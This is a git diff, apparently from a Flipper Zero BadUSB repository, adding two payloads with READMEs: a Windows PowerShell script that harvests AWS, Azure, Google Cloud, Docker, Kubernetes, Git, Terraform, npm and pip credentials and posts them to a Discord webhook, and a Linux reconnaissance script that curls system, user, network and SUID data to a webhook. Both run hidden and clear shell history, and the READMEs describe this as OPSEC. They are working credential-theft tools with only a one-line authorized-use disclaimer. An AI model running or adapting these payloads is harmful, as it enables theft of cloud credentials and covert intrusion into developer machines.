aleff-github · bad-antics · Mar 5, 2026
diff --git a/badusb/NullSec-CloudHarvester/README.md b/badusb/NullSec-CloudHarvester/README.md
@@ -0,0 +1,53 @@
+# NullSec-CloudHarvester
+
+**Cloud Service Credential & Configuration Extractor**
+
+## Description
+
+Extracts saved cloud CLI credentials, API tokens, and configuration files from a Windows target. Targets developers and DevOps engineers who use cloud CLIs.
+
+## Targeted Services
+
+| Service | Files Extracted |
+|---------|----------------|
+| **AWS CLI** | `~/.aws/credentials`, `~/.aws/config` |
+| **Azure CLI** | `~/.azure/azureProfile.json`, `clouds.config` |
+| **Google Cloud** | `application_default_credentials.json`, `properties`, `credentials.db` path |
+| **Docker** | `~/.docker/config.json` (registry auth tokens) |
+| **Kubernetes** | `~/.kube/config` (cluster creds + certs) |
+| **SSH** | Key file inventory from `~/.ssh/` |
+| **Git** | `~/.git-credentials`, `~/.gitconfig` |
+| **Terraform** | `~/.terraformrc`, `credentials.tfrc.json` |
+| **npm** | `~/.npmrc` (registry tokens) |
+| **pip** | `pip.ini` (index credentials) |
+
+## Setup
+
+1. Edit `payload.txt` and replace `YOUR_DISCORD_WEBHOOK_URL` with your Discord webhook
+2. Copy to Flipper Zero SD: `SD/badusb/NullSec-CloudHarvester/`
+3. Run via BadUSB app
+
+## Exfiltration
+
+Data is sent to a Discord webhook in chunked messages (1900 char limit per message). Each cloud service section is clearly labeled.
+
+## Target
+
+- **OS:** Windows 10/11
+- **Requirements:** PowerShell (default on Windows)
+- **Best against:** Developer workstations, CI/CD machines, DevOps laptops
+
+## OPSEC Notes
+
+- Runs in hidden PowerShell window
+- Clears PSReadLine history on exit
+- No files written to disk
+- No persistent modifications
+
+## Legal
+
+**For authorized penetration testing and security assessments only.**
+
+## Author
+
+NullSec ([@bad-antics](https://github.com/bad-antics))
diff --git a/badusb/NullSec-CloudHarvester/payload.txt b/badusb/NullSec-CloudHarvester/payload.txt
@@ -0,0 +1,121 @@
+REM ################################################
+REM # NullSec-CloudHarvester                       #
+REM # Cloud Service Credential & Config Extractor   #
+REM # Target: Windows 10/11                         #
+REM # Author: NullSec (github.com/bad-antics)       #
+REM ################################################
+REM
+REM Extracts saved cloud CLI credentials and configs:
+REM - AWS CLI credentials & config
+REM - Azure CLI tokens & profiles  
+REM - Google Cloud SDK configs
+REM - Docker configs & registries
+REM - Kubernetes configs
+REM - Terraform state references
+REM - SSH keys inventory
+REM - Git credentials
+REM
+REM Exfiltration: Discord Webhook (configure below)
+REM For authorized penetration testing only.
+
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell -w hidden -ep bypass
+ENTER
+DELAY 1500
+
+REM === CONFIGURE YOUR WEBHOOK HERE ===
+STRING $wh='YOUR_DISCORD_WEBHOOK_URL';
+ENTER
+
+STRING $r=@();$u=$env:USERPROFILE;$h=$env:COMPUTERNAME;
+ENTER
+
+REM --- AWS Credentials ---
+STRING $awsCred="$u\.aws\credentials";$awsConf="$u\.aws\config";
+ENTER
+STRING if(Test-Path $awsCred){$r+="=== AWS CREDENTIALS ===`n"+(gc $awsCred -Raw)}
+ENTER
+STRING if(Test-Path $awsConf){$r+="=== AWS CONFIG ===`n"+(gc $awsConf -Raw)}
+ENTER
+
+REM --- Azure CLI ---
+STRING $azDir="$u\.azure";
+ENTER
+STRING if(Test-Path "$azDir\azureProfile.json"){$r+="=== AZURE PROFILE ===`n"+(gc "$azDir\azureProfile.json" -Raw)}
+ENTER
+STRING if(Test-Path "$azDir\clouds.config"){$r+="=== AZURE CLOUDS ===`n"+(gc "$azDir\clouds.config" -Raw)}
+ENTER
+
+REM --- Google Cloud ---
+STRING $gDir="$env:APPDATA\gcloud";
+ENTER
+STRING if(Test-Path "$gDir\credentials.db"){$r+="=== GCLOUD CREDS DB EXISTS ===`nPath: $gDir\credentials.db"}
+ENTER
+STRING if(Test-Path "$gDir\properties"){$r+="=== GCLOUD PROPERTIES ===`n"+(gc "$gDir\properties" -Raw)}
+ENTER
+STRING if(Test-Path "$gDir\application_default_credentials.json"){$r+="=== GCLOUD ADC ===`n"+(gc "$gDir\application_default_credentials.json" -Raw)}
+ENTER
+
+REM --- Docker ---
+STRING $dk="$u\.docker\config.json";
+ENTER
+STRING if(Test-Path $dk){$r+="=== DOCKER CONFIG ===`n"+(gc $dk -Raw)}
+ENTER
+
+REM --- Kubernetes ---
+STRING $kc="$u\.kube\config";
+ENTER
+STRING if(Test-Path $kc){$r+="=== KUBECONFIG ===`n"+(gc $kc -Raw)}
+ENTER
+
+REM --- SSH Keys Inventory ---
+STRING $sshDir="$u\.ssh";
+ENTER
+STRING if(Test-Path $sshDir){$keys=gci $sshDir -File|%{$_.Name};$r+="=== SSH KEYS ===`n"+($keys-join"`n")}
+ENTER
+
+REM --- Git Credentials ---
+STRING $gitCred="$u\.git-credentials";
+ENTER
+STRING if(Test-Path $gitCred){$r+="=== GIT CREDENTIALS ===`n"+(gc $gitCred -Raw)}
+ENTER
+STRING $gitConf="$u\.gitconfig";
+ENTER
+STRING if(Test-Path $gitConf){$r+="=== GITCONFIG ===`n"+(gc $gitConf -Raw)}
+ENTER
+
+REM --- Terraform ---
+STRING $tfrc="$u\.terraformrc";$tfCred="$env:APPDATA\terraform.d\credentials.tfrc.json";
+ENTER
+STRING if(Test-Path $tfrc){$r+="=== TERRAFORMRC ===`n"+(gc $tfrc -Raw)}
+ENTER
+STRING if(Test-Path $tfCred){$r+="=== TERRAFORM CREDS ===`n"+(gc $tfCred -Raw)}
+ENTER
+
+REM --- npm/pip tokens ---
+STRING $npmrc="$u\.npmrc";
+ENTER
+STRING if(Test-Path $npmrc){$r+="=== NPMRC ===`n"+(gc $npmrc -Raw)}
+ENTER
+STRING $pipConf="$env:APPDATA\pip\pip.ini";
+ENTER
+STRING if(Test-Path $pipConf){$r+="=== PIP CONFIG ===`n"+(gc $pipConf -Raw)}
+ENTER
+
+REM --- Exfiltrate ---
+STRING $out="Cloud Harvest [$h] User: $env:USERNAME`n"+($r-join"`n---`n");
+ENTER
+STRING $chunks=[math]::Ceiling($out.Length/1900);
+ENTER
+STRING for($i=0;$i -lt $chunks;$i++){$chunk=$out.Substring($i*1900,[math]::Min(1900,$out.Length-$i*1900));
+ENTER
+STRING $body=@{content="``````$chunk``````"}|ConvertTo-Json;
+ENTER
+STRING irm $wh -Method Post -Body $body -ContentType 'application/json' -ea SilentlyContinue}
+ENTER
+
+REM --- Cleanup ---
+STRING Remove-Item (Get-PSReadLineOption).HistorySavePath -ea SilentlyContinue;exit
+ENTER
diff --git a/badusb/NullSec-LinuxRecon/README.md b/badusb/NullSec-LinuxRecon/README.md
@@ -0,0 +1,49 @@
+# NullSec-LinuxRecon
+
+**Comprehensive Linux System Reconnaissance via BadUSB**
+
+## Description
+
+Performs thorough system reconnaissance on Linux targets (Ubuntu, Debian, Fedora, Arch, etc.) and exfiltrates findings via webhook.
+
+## Information Gathered
+
+| Category | Details |
+|----------|---------|
+| **System** | Hostname, kernel, distro, uptime, CPU, RAM, disk |
+| **User** | Current user, UID, groups, sudo privileges, shell, SSH keys |
+| **Users** | All accounts with shell access |
+| **Network** | Interfaces, IPs, gateway, DNS, ARP table |
+| **Ports** | All listening TCP/UDP ports with process names |
+| **Services** | Running systemd services |
+| **Cron** | User and system cron jobs |
+| **Security** | iptables/ufw rules, SELinux, AppArmor status |
+| **SUID** | SUID binaries (privilege escalation candidates) |
+| **Containers** | Docker/Podman running containers |
+| **Files** | Cloud creds existence check (AWS, Kube, Docker) |
+
+## Setup
+
+1. Edit `payload.txt` and replace `YOUR_WEBHOOK_URL` with your Discord/Slack webhook
+2. Copy to Flipper Zero SD: `SD/badusb/NullSec-LinuxRecon/`
+
+## Terminal Launch
+
+Uses `Ctrl+Alt+T` which works on most Linux desktop environments:
+- GNOME, KDE, XFCE, MATE, Cinnamon, Unity
+
+## OPSEC
+
+- Runs entirely in background subshell
+- Clears bash history after execution
+- Unsets variables
+- No files written to disk
+- Terminal window closes automatically
+
+## Legal
+
+**For authorized penetration testing and security assessments only.**
+
+## Author
+
+NullSec ([@bad-antics](https://github.com/bad-antics))
diff --git a/badusb/NullSec-LinuxRecon/payload.txt b/badusb/NullSec-LinuxRecon/payload.txt
@@ -0,0 +1,166 @@
+REM ################################################
+REM # NullSec-LinuxRecon                           #
+REM # Linux System Reconnaissance via BadUSB        #
+REM # Target: Linux (Ubuntu/Debian/Fedora/Arch)     #
+REM # Author: NullSec (github.com/bad-antics)       #
+REM ################################################
+REM
+REM Comprehensive Linux system reconnaissance:
+REM - System info (kernel, distro, arch, uptime)
+REM - Network config (interfaces, routes, DNS, ARP)
+REM - User enumeration (users, groups, sudo, SSH keys)
+REM - Running services and open ports
+REM - Cron jobs and scheduled tasks
+REM - Installed packages (security-relevant)
+REM - Docker/container detection
+REM - SUID/SGID binary enumeration
+REM - Firewall rules
+REM
+REM Exfiltration: Webhook (configure below)
+REM For authorized penetration testing only.
+
+DELAY 1000
+
+REM Open terminal - try multiple methods
+CTRL ALT t
+DELAY 1500
+
+REM === CONFIGURE YOUR WEBHOOK HERE ===
+STRING export WH='YOUR_WEBHOOK_URL'
+ENTER
+DELAY 200
+
+STRING bash -c '(
+ENTER
+STRING R=""
+ENTER
+
+REM --- System Info ---
+STRING R+="=== SYSTEM INFO ===\n"
+ENTER
+STRING R+="Hostname: $(hostname)\n"
+ENTER
+STRING R+="Kernel: $(uname -a)\n"
+ENTER
+STRING R+="Distro: $(cat /etc/os-release 2>/dev/null | grep PRETTY | cut -d= -f2)\n"
+ENTER
+STRING R+="Uptime: $(uptime -p 2>/dev/null || uptime)\n"
+ENTER
+STRING R+="Arch: $(arch)\n"
+ENTER
+STRING R+="CPU: $(grep -m1 "model name" /proc/cpuinfo 2>/dev/null | cut -d: -f2)\n"
+ENTER
+STRING R+="RAM: $(free -h 2>/dev/null | awk "/Mem:/{print \$2}")\n"
+ENTER
+STRING R+="Disk: $(df -h / 2>/dev/null | awk "NR==2{print \$2,\$5}")\n\n"
+ENTER
+
+REM --- Current User ---
+STRING R+="=== USER INFO ===\n"
+ENTER
+STRING R+="User: $(whoami)\n"
+ENTER
+STRING R+="UID: $(id)\n"
+ENTER
+STRING R+="Groups: $(groups)\n"
+ENTER
+STRING R+="Sudo: $(sudo -n -l 2>/dev/null | head -5 || echo "requires password")\n"
+ENTER
+STRING R+="Home: $(ls -la ~ 2>/dev/null | head -5)\n"
+ENTER
+STRING R+="Shell: $SHELL\n"
+ENTER
+STRING R+="SSH Keys: $(ls ~/.ssh/ 2>/dev/null | tr "\n" " " || echo "none")\n\n"
+ENTER
+
+REM --- Other Users ---
+STRING R+="=== ALL USERS (shell access) ===\n"
+ENTER
+STRING R+="$(grep -v nologin /etc/passwd 2>/dev/null | grep -v false | cut -d: -f1,3,6)\n\n"
+ENTER
+
+REM --- Network ---
+STRING R+="=== NETWORK ===\n"
+ENTER
+STRING R+="$(ip -4 addr show 2>/dev/null | grep -E "inet |^[0-9]" || ifconfig 2>/dev/null | grep -E "inet |^[a-z]")\n"
+ENTER
+STRING R+="Gateway: $(ip route show default 2>/dev/null | awk "{print \$3}")\n"
+ENTER
+STRING R+="DNS: $(cat /etc/resolv.conf 2>/dev/null | grep nameserver | awk "{print \$2}" | tr "\n" " ")\n"
+ENTER
+STRING R+="ARP: $(arp -n 2>/dev/null | grep -v Address | head -10)\n\n"
+ENTER
+
+REM --- Listening Ports ---
+STRING R+="=== LISTENING PORTS ===\n"
+ENTER
+STRING R+="$(ss -tulnp 2>/dev/null | head -20 || netstat -tulnp 2>/dev/null | head -20)\n\n"
+ENTER
+
+REM --- Services ---
+STRING R+="=== RUNNING SERVICES ===\n"
+ENTER
+STRING R+="$(systemctl list-units --type=service --state=running 2>/dev/null | head -20 || service --status-all 2>/dev/null | grep + | head -20)\n\n"
+ENTER
+
+REM --- Cron ---
+STRING R+="=== CRON JOBS ===\n"
+ENTER
+STRING R+="$(crontab -l 2>/dev/null || echo "no user crontab")\n"
+ENTER
+STRING R+="System cron: $(ls /etc/cron.d/ 2>/dev/null | tr "\n" " ")\n\n"
+ENTER
+
+REM --- Security ---
+STRING R+="=== SECURITY ===\n"
+ENTER
+STRING R+="Firewall (iptables): $(iptables -L -n 2>/dev/null | head -10 || echo "no access")\n"
+ENTER
+STRING R+="Firewall (ufw): $(ufw status 2>/dev/null || echo "not installed")\n"
+ENTER
+STRING R+="SELinux: $(getenforce 2>/dev/null || echo "not installed")\n"
+ENTER
+STRING R+="AppArmor: $(aa-status 2>/dev/null | head -3 || echo "not installed")\n\n"
+ENTER
+
+REM --- SUID Binaries ---
+STRING R+="=== SUID BINARIES ===\n"
+ENTER
+STRING R+="$(find /usr/bin /usr/sbin /bin /sbin -perm -4000 2>/dev/null | head -15)\n\n"
+ENTER
+
+REM --- Docker ---
+STRING R+="=== CONTAINERS ===\n"
+ENTER
+STRING R+="Docker: $(docker ps 2>/dev/null | head -10 || echo "not available")\n"
+ENTER
+STRING R+="Podman: $(podman ps 2>/dev/null | head -5 || echo "not available")\n\n"
+ENTER
+
+REM --- Interesting Files ---
+STRING R+="=== INTERESTING FILES ===\n"
+ENTER
+STRING R+="Bash history: $(wc -l < ~/.bash_history 2>/dev/null || echo 0) lines\n"
+ENTER
+STRING R+="AWS: $(test -f ~/.aws/credentials && echo "FOUND" || echo "none")\n"
+ENTER
+STRING R+="Kube: $(test -f ~/.kube/config && echo "FOUND" || echo "none")\n"
+ENTER
+STRING R+="Docker: $(test -f ~/.docker/config.json && echo "FOUND" || echo "none")\n"
+ENTER
+
+REM --- Exfiltrate ---
+STRING printf "%s" "$R" | fold -w 1900 | while IFS= read -r chunk; do
+ENTER
+STRING curl -s -X POST "$WH" -H "Content-Type: application/json" -d "{\"content\":\"\`\`\`$chunk\`\`\`\"}" 2>/dev/null
+ENTER
+STRING sleep 1; done
+ENTER
+
+REM --- Cleanup ---
+STRING history -c; unset WH R
+ENTER
+STRING ) &>/dev/null &'
+ENTER
+STRING exit
+ENTER